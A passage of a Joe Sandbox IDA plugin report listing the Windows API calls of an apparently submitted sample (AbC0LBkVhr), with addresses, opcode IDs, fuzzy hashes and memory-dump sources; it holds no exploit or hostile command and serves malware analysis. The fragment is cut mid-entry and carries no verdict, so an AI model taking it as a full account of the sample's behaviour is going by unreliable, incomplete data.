                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage
                                                          • String ID:
                                                          • API String ID: 1306739567-0
                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                          APIs
                                                          • SetEndOfFile.KERNEL32(?,02117FF4,0040A08C,00000000), ref: 004076B3
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 734332943-0
                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                          APIs
                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
• Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
• Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
• Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
• Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
• Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
• SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
• Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
• Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
• Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
• Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
• Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
• Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
APIs
• GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
• Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
• Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
• Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
• Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
• Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
• Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
• Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Memory Dump Source
• Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
• Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale$DefaultSystem
                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                          • API String ID: 1044490935-665933166
                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                          • LocalFree.KERNEL32(00680C50,00000000,00401AB4), ref: 00401A1B
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00680C50,00000000,00401AB4), ref: 00401A3A
                                                          • LocalFree.KERNEL32(0067F290,?,00000000,00008000,00680C50,00000000,00401AB4), ref: 00401A79
                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                          • String ID:
                                                          • API String ID: 3782394904-0
                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExitMessageProcess
                                                          • String ID: Error$Runtime error at 00000000$9@
                                                          • API String ID: 1220098344-1503883590
                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 262959230-0
                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleLineModule
                                                          • String ID: U1hd.@$%f
                                                          • API String ID: 2123368496-3738993387
                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                          APIs
                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                          • String ID:
                                                          • API String ID: 730355536-0
                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
